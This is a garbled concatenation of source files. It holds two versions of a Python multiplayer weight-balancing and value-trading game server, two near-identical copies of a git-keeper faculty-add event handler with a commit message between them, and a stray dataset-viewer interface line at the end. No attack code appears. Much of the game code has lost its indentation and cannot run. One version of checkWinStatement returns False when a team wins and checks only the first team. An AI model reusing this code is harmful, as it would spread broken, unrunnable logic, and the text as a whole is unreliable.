        Returns the offered value to playerFrom's available pool and clears
        both players' proposition records; False when no such offer exists.
        Note the single except covers every lookup/del below, so a missing
        record on either side aborts with False (possibly mid-mutation).
        """
        try:
            valueFrom = playerFrom.data['dataGame']['propositions']['to'][playerTo]
            playerFrom.data['dataGame']['available'].append(valueFrom)
            del playerFrom.data['dataGame']['propositions']['to'][playerTo]
            del playerTo.data['dataGame']['propositions']['from'][playerFrom]
            return True
        except KeyError:
            return False
    def randomizeValues(self,summary):
        """Split *summary* into a random list of positive ints summing to it.

        Parts are drawn from a normal distribution centered near summary/3;
        if more than summary/2 parts were produced the whole split is
        retried recursively.
        """
        ret = []
        remain = summary
        while remain > 0:
            number = round(random.normalvariate(floor(summary/3), summary/3))
            if number > 0:
                # Clamp the final part so the total lands exactly on summary.
                if number >= remain:
                    number = remain
                remain = remain - number
                ret.append(number)
        if len(ret) > summary/2:
            return self.randomizeValues(summary)
        return ret
    def checkWinStatement(self):
        """Return True when the game is over, resolving the winner if needed.

        A team wins when every one of its players has both pans ('left' and
        'right') summing exactly to that player's 'summary' target.  The
        first winning team ends the round and is recorded in self.winner.
        """
        if self.winner:
            return True
        if not self.playable:
            return False
        for team in self.teams:
            win = True
            for player in team.players:
                if sum(player.data['dataGame']['left']) == player.data['dataGame']['summary'] and sum(player.data['dataGame']['right']) == player.data['dataGame']['summary']:
                    pass
                else:
                    win = False
            if win:
                self.playable = False
                self.winner = team.name
                return True
        return False
def getPlayerById(self, player_id):
ret = []
for player in self.players:
if player.id == int(player_id):
ret.append(player)
if len(ret) == 1:
return ret[0]
return False
    def getPlayerUpdate(self, player):
        """Build the per-player state payload sent to the client.

        Includes the teammate roster, the available pool, both pans, and
        pending propositions in both directions (keyed back to player ids
        for serialization).
        """
        team = player.team
        return {
            "players": [{"name": player.nick, "id": player.id} for player in self.players if player.team == team],
            "available": player.data['dataGame']['available'],
            "left": player.data['dataGame']['left'],
            "right": player.data['dataGame']['right'],
            "from": [{"id": p.id, "value": player.data['dataGame']['propositions']['from'][p]} for p in player.data['dataGame']['propositions']['from'].keys()],
            "to": [{"id": p.id, "value": player.data['dataGame']['propositions']['to'][p]} for p in player.data['dataGame']['propositions']['to'].keys()]
        };
    def destroy(self):
        # Framework teardown hook; this game holds no external resources.
        pass
"""
players = [ {"name" : "player"}, {"name" : "player2"} ]
demo = Demo(players);
demo.start()
demo.destroy()
print(Game.getGamesArray())
"""
refresh
#!/usr/bin/python3
from Games.Game import Game
import time
import random
from math import ceil, floor;
from Team import Team
import os.path
if __name__ == "__main__":
raise Exception("You cannot run this file directly")
class game(Game):
def __init__(self, players):
self.filename = os.path.dirname(os.path.realpath(__file__));
self.load()
self.players = players
self.teams = []
self.playable = False
self.started = False
self.winner = False
def addPlayer(self, player):
self.players.append(player)
return self
def doAction(self, data):
print(self.players)
try:
action = data['action']
except KeyError:
return False
try:
player = self.getPlayerById(data['id'])
print(player)
except KeyError:
return False
if not player:
return False
update = False
if action == 'move':
args = {}
try:
args['from'] = data['from']
except KeyError:
return False
try:
args['to'] = data['to']
except KeyError:
return False
try:
args['weight'] = data['weight']
except KeyError:
return False
if args['from'] == 'available':
if args['to'] == 'left' or args['to'] == 'right':
if self.moveValueToWeight(player, args['weight'], player.data['dataGame'][args['to']]):
data['action'] = 'move_accepted';
player.sendMessage(data)
return True
elif args['from'] == 'left' or args['from'] == 'right':
if args['to'] == 'available':
if self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
data['action'] = 'move_accepted';
player.sendMessage(data)
update = True
else:
if self.moveValueBetweenWeights(player, player.data['dataGame'][args['from']], player.data['dataGame'][args['to']], args['weight']):
data['action'] = 'move_accepted';
player.sendMessage(data)
update = True
elif action == 'proposition':
args = {}
try:
args['from'] = data['from']
except KeyError:
return False
try:
args['to'] = self.getPlayerById(data['to'])
except KeyError:
return False
try:
args['weight'] = data['weight']
except KeyError:
return False
if args['from'] == 'left' or args['from'] == 'right':
if not self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
return False
if self.setProposition(player, args['to'], args['weight']):
data['action'] = 'proposition_accepted'
player.sendMessage(data)
update = True
elif action == "start":
if not self.playable:
self.start()
for player in self.players:
player.sendMessage({
"action": "updateStatus",
"gameStatus": "playable",
"playerData": self.getPlayerUpdate(player)
})
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
"""
try:
value = data['value']
except KeyError:
value = False
default = {
"action": "none"
}
if not self.playable:
if not self.started:
pass
else:
if player:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner,
})
update = True
elif data['action'] == "moveValueToWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['left']
else:
weight = self.player.data['dataGame']['right']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueToWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "moveValueFromWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['propositions']['left']
else:
weight = self.player.data['dataGame']['propositions']['left']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueFromWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "setProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player and value:
data['success'] = self.setProposition(player, playerTo, value)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
elif data['action'] == "removeProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player:
data['success'] = self.removeProposition(player, playerTo)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
return False
"""
def start(self):
self.prepareTeams()
self.preparePlayers()
self.winner = False
self.playable = True
self.started = True
return self
def prepareTeams(self, teamNumber = 2):
random.shuffle(self.players)
for i in range(teamNumber):
self.teams.append(Team())
counter = 0
for player in self.players:
self.teams[counter % teamNumber].addPlayer(player)
counter = counter + 1;
return self
def preparePlayers(self):
for team in self.teams:
values = []
for player in team.players:
player.data['dataGame'] = {"summary": random.randint(5,15), "propositions": {"from": {}, "to": {}}, "left": [], "right": []}
tmp = self.randomizeValues(player.data['dataGame']['summary']) + self.randomizeValues(player.data['dataGame']['summary'])
player.data['dataGame']['count'] = len(tmp)
values = values + tmp
random.shuffle(values)
for player in team.players:
player.data['dataGame']['available'] = values[0:player.data['dataGame']['count']]
values = values[player.data['dataGame']['count']:]
for player in team.players:
print([player.nick, player.data, player.team.id])
return self
def moveValueToWeight(self, player, value, weight):
try:
index = player.data['dataGame']['available'].index(value)
val = player.data['dataGame']['available'][index]
weight.append(val)
del player.data['dataGame']['available'][index]
return True
except ValueError:
return False
def moveValueFromWeight(self, player, value, weight):
try:
index = weight.index(value)
val = weight[index]
player.data['dataGame']['available'].append(val)
del weight[index]
return self
except ValueError:
return self
def moveValueBetweenWeights(self, player, From, To, weight):
try:
indexFrom = From.index(weight)
val = From[indexFrom]
To.append(val)
del From[indexFrom]
return True
except ValueError:
return False
def setProposition(self, playerFrom, playerTo, value):
    """Offer `value` from playerFrom to playerTo; if playerTo already has a
    counter-offer pending back to playerFrom, complete the exchange.

    Returns False when an offer between these two players is already
    pending (in either direction) or when `value` is not in playerFrom's
    available pool; returns True otherwise. Proposition maps are keyed by
    the player objects themselves.
    """
    #print(self.checkWinStatement())
    try:
        # Probe both directions: a KeyError from either lookup means no
        # offer is pending yet, so we may proceed.
        # NOTE(review): if a stored proposition value were falsy (e.g. 0),
        # the `or` would fall through to the second lookup — presumably
        # values are always positive; confirm against randomizeValues.
        tmp = playerFrom.data['dataGame']['propositions']['to'][playerTo] or playerTo.data['dataGame']['propositions']['from'][playerFrom]
        return False
    except KeyError:
        try:
            # Reserve the offered value: pull it out of the sender's pool
            # and record it on both players' proposition maps.
            index = playerFrom.data['dataGame']['available'].index(value)
            playerFrom.data['dataGame']['propositions']['to'][playerTo] = playerFrom.data['dataGame']['available'][index]
            playerTo.data['dataGame']['propositions']['from'][playerFrom] = playerFrom.data['dataGame']['available'][index]
            del playerFrom.data['dataGame']['available'][index];
            try:
                # If playerTo already had an offer pending toward playerFrom,
                # complete the trade: each side receives the other's value
                # and all four bookkeeping entries are cleared.
                valueToPlayerFrom = playerTo.data['dataGame']['propositions']['to'][playerFrom]
                valueToPlayerTo = playerFrom.data['dataGame']['propositions']['to'][playerTo]
                playerTo.data['dataGame']['available'].append(valueToPlayerTo)
                playerFrom.data['dataGame']['available'].append(valueToPlayerFrom)
                del playerTo.data['dataGame']['propositions']['to'][playerFrom]
                del playerTo.data['dataGame']['propositions']['from'][playerFrom]
                del playerFrom.data['dataGame']['propositions']['to'][playerTo]
                del playerFrom.data['dataGame']['propositions']['from'][playerTo]
                return True
            except KeyError:
                # No counter-offer yet; this proposition simply stays pending.
                pass
            return True
        except ValueError:
            # `value` was not in the sender's available pool.
            return False
def removeProposition(self, playerFrom, playerTo):
    """Withdraw playerFrom's pending proposition to playerTo, refunding the
    proposed value to playerFrom's available pool.

    Returns True on success, False when no such proposition exists.
    """
    try:
        outgoing = playerFrom.data['dataGame']['propositions']['to']
        refund = outgoing[playerTo]
        # Return the value to the sender, then drop both sides' entries.
        playerFrom.data['dataGame']['available'].append(refund)
        del outgoing[playerTo]
        del playerTo.data['dataGame']['propositions']['from'][playerFrom]
        return True
    except KeyError:
        return False
def randomizeValues(self,summary):
ret = []
remain = summary
while remain > 0:
number = round(random.normalvariate(floor(summary/3), summary/3))
if number > 0:
if number >= remain:
number = remain
remain = remain - number
ret.append(number)
if len(ret) > summary/2:
return self.randomizeValues(summary)
return ret
def checkWinStatement(self):
    """Check whether a team has won: every member's left and right scales
    each sum to that member's target ("summary").

    Returns True if a winner was already decided on an earlier call; when
    a fresh win is detected it records the winner, freezes play, and
    returns False.

    NOTE(review): this file reached us with indentation stripped; the
    nesting below is a reconstruction. In particular the trailing
    `return True` appears to sit inside the team loop, so only the first
    team is ever examined — confirm against upstream history.
    """
    if self.winner:
        return True
    if not self.playable:
        return False
    for team in self.teams:
        win = True
        for player in team.players:
            # A player is balanced when both pans hit the target sum.
            if sum(player.data['dataGame']['left']) == player.data['dataGame']['summary'] and sum(player.data['dataGame']['right']) == player.data['dataGame']['summary']:
                pass
            else:
                win = False
        if win:
            self.playable = False
            self.winner = team.name
            return False
        return True
    return False
def getPlayerById(self, player_id):
    """Look up a player by numeric id (accepts ints or numeric strings).

    Returns the player when exactly one matches, otherwise False.
    """
    matches = [p for p in self.players if p.id == int(player_id)]
    return matches[0] if len(matches) == 1 else False
def getPlayerUpdate(self, player):
    """Build the state snapshot sent to `player`: teammates, value pools,
    and pending propositions in both directions.
    """
    team = player.team
    dataGame = player.data['dataGame']
    teammates = [{"name": mate.nick, "id": mate.id}
                 for mate in self.players if mate.team == team]
    return {
        "players": teammates,
        "available": dataGame['available'],
        "left": dataGame['left'],
        "right": dataGame['right'],
        # Proposition maps are keyed by player objects; serialize each
        # entry as an {id, value} pair for the wire.
        "from": [{"id": other.id, "value": val}
                 for other, val in dataGame['propositions']['from'].items()],
        "to": [{"id": other.id, "value": val}
               for other, val in dataGame['propositions']['to'].items()],
    }
def destroy(self):
    # Teardown hook invoked when the game is discarded; currently a no-op.
    pass
"""
players = [ {"name" : "player"}, {"name" : "player2"} ]
demo = Demo(players);
demo.start()
demo.destroy()
print(Game.getGamesArray())
"""
|
# Copyright 2016, 2017, 2018 Nathan Sommer and Ben Coleman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Provides a handler for adding faculty users."""
import json
from gkeepcore.path_utils import user_from_log_path
from gkeepserver.event_handler import EventHandler, HandlerException
from gkeepserver.faculty import FacultyMembers
from gkeepserver.gkeepd_logger import gkeepd_logger
from gkeepserver.handler_utils import log_gkeepd_to_faculty
from gkeepserver.info_update_thread import info_updater
class FacultyAddHandler(EventHandler):
    """Handle adding new faculty members."""

    def handle(self):
        """
        Handle adding a new faculty member.

        Writes success or failure to the gkeepd to faculty log.
        """
        try:
            faculty_members = FacultyMembers()

            # Refuse to clobber an existing account.
            if faculty_members.faculty_exists(self._username):
                error = 'Faculty user {} already exists'.format(self._username)
                raise HandlerException(error)

            faculty_members.add_faculty(self._last_name, self._first_name,
                                        self._email_address, self._admin)
            info_updater.enqueue_full_scan(self._username)
            self._log_to_faculty('FACULTY_ADD_SUCCESS', self._username)
        except Exception as e:
            # Any failure is reported back to the requesting faculty member
            # and recorded in the server log.
            self._log_error_to_faculty(str(e))
            gkeepd_logger.log_warning('Faculty add failed: {0}'.format(e))

    def __repr__(self) -> str:
        """
        Build a string representation of the event.

        :return: string representation of the event
        """
        string = 'Add faculty event: {0}'.format(self._payload)
        return string

    def _parse_payload(self):
        """
        Extracts the faculty info from the payload

        Raises HandlerException if the log line is not well formed.

        Sets the following attributes:

        _adder_username - username of the user adding the faculty member
        _last_name - last name of the new faculty member
        _first_name - first name of the new faculty member
        _username - username of the new faculty member
        _email_address - email address of the new faculty member
        _admin - whether or not the new user should be an admin
        """
        self._adder_username = user_from_log_path(self._log_path)

        try:
            faculty_dictionary = json.loads(self._payload)
        except json.JSONDecodeError:
            raise HandlerException('Payload is not valid JSON')

        for required_field in ('last_name', 'first_name', 'email_address',
                               'admin'):
            if required_field not in faculty_dictionary:
                raise HandlerException('Missing required field {}'
                                       .format(required_field))

        self._last_name = faculty_dictionary['last_name']
        self._first_name = faculty_dictionary['first_name']
        # Fixed: read the 'email_address' key (was misspelled 'email_adress',
        # which always raised KeyError since the schema check above
        # guarantees only the correctly spelled key).
        self._email_address = faculty_dictionary['email_address']
        self._admin = faculty_dictionary['admin']

        try:
            # Fixed: derive the username from the email address itself (was
            # reading a nonexistent 'email_add' key). Tuple unpacking raises
            # ValueError unless the address contains exactly one '@'.
            self._username, _ = self._email_address.split('@')
        except ValueError:
            raise HandlerException('{} is not an email address'
                                   .format(self._email_address))

    def _log_to_faculty(self, event_type, text):
        """
        Write to the gkeepd.log for the faculty member.

        :param event_type: event type
        :param text: text to write to the log
        """
        # NOTE(review): _faculty_username is never assigned in this class —
        # presumably set by the EventHandler base; confirm.
        log_gkeepd_to_faculty(self._faculty_username, event_type, text)

    def _log_error_to_faculty(self, error):
        """
        Log a FACULTY_ADD_ERROR message to the gkeepd.log for the faculty.

        :param error: the error message
        """
        self._log_to_faculty('FACULTY_ADD_ERROR', error)
Commit message: Fix email address errors — read the correctly spelled 'email_address' payload key and derive the username by splitting the address at '@'.
# Copyright 2016, 2017, 2018 Nathan Sommer and Ben Coleman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Provides a handler for adding faculty users."""
import json
from gkeepcore.path_utils import user_from_log_path
from gkeepserver.event_handler import EventHandler, HandlerException
from gkeepserver.faculty import FacultyMembers
from gkeepserver.gkeepd_logger import gkeepd_logger
from gkeepserver.handler_utils import log_gkeepd_to_faculty
from gkeepserver.info_update_thread import info_updater
class FacultyAddHandler(EventHandler):
    """Handle adding new faculty members."""

    def handle(self):
        """
        Handle adding a new faculty member.

        Writes success or failure to the gkeepd to faculty log.
        """
        try:
            members = FacultyMembers()

            # Refuse to clobber an existing account.
            if members.faculty_exists(self._username):
                error = 'Faculty user {} already exists'.format(self._username)
                raise HandlerException(error)

            members.add_faculty(self._last_name, self._first_name,
                                self._email_address, self._admin)
            info_updater.enqueue_full_scan(self._username)
            self._log_to_faculty('FACULTY_ADD_SUCCESS', self._username)
        except Exception as exc:
            # Any failure is reported back to the requesting faculty member
            # and recorded in the server log.
            self._log_error_to_faculty(str(exc))
            gkeepd_logger.log_warning('Faculty add failed: {0}'.format(exc))

    def __repr__(self) -> str:
        """
        Build a string representation of the event.

        :return: string representation of the event
        """
        return 'Add faculty event: {0}'.format(self._payload)

    def _parse_payload(self):
        """
        Extract the new faculty member's info from the JSON payload.

        Raises HandlerException if the log line is not well formed.

        Sets the following attributes:

        _adder_username - username of the user adding the faculty member
        _last_name - last name of the new faculty member
        _first_name - first name of the new faculty member
        _username - username of the new faculty member
        _email_address - email address of the new faculty member
        _admin - whether or not the new user should be an admin
        """
        self._adder_username = user_from_log_path(self._log_path)

        try:
            faculty_dictionary = json.loads(self._payload)
        except json.JSONDecodeError:
            raise HandlerException('Payload is not valid JSON')

        # Validate the schema up front, reporting the first missing field
        # in declaration order.
        missing = [field
                   for field in ('last_name', 'first_name', 'email_address',
                                 'admin')
                   if field not in faculty_dictionary]
        if missing:
            raise HandlerException('Missing required field {}'
                                   .format(missing[0]))

        self._last_name = faculty_dictionary['last_name']
        self._first_name = faculty_dictionary['first_name']
        self._email_address = faculty_dictionary['email_address']
        self._admin = faculty_dictionary['admin']

        try:
            # The username is the local part of the address; tuple unpacking
            # raises ValueError unless there is exactly one '@'.
            self._username, _ = self._email_address.split('@')
        except ValueError:
            raise HandlerException('{} is not an email address'
                                   .format(self._email_address))

    def _log_to_faculty(self, event_type, text):
        """
        Write to the gkeepd.log for the faculty member.

        :param event_type: event type
        :param text: text to write to the log
        """
        # NOTE(review): _faculty_username is never assigned in this class —
        # presumably set by the EventHandler base; confirm.
        log_gkeepd_to_faculty(self._faculty_username, event_type, text)

    def _log_error_to_faculty(self, error):
        """
        Log a FACULTY_ADD_ERROR message to the gkeepd.log for the faculty.

        :param error: the error message
        """
        self._log_to_faculty('FACULTY_ADD_ERROR', error)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.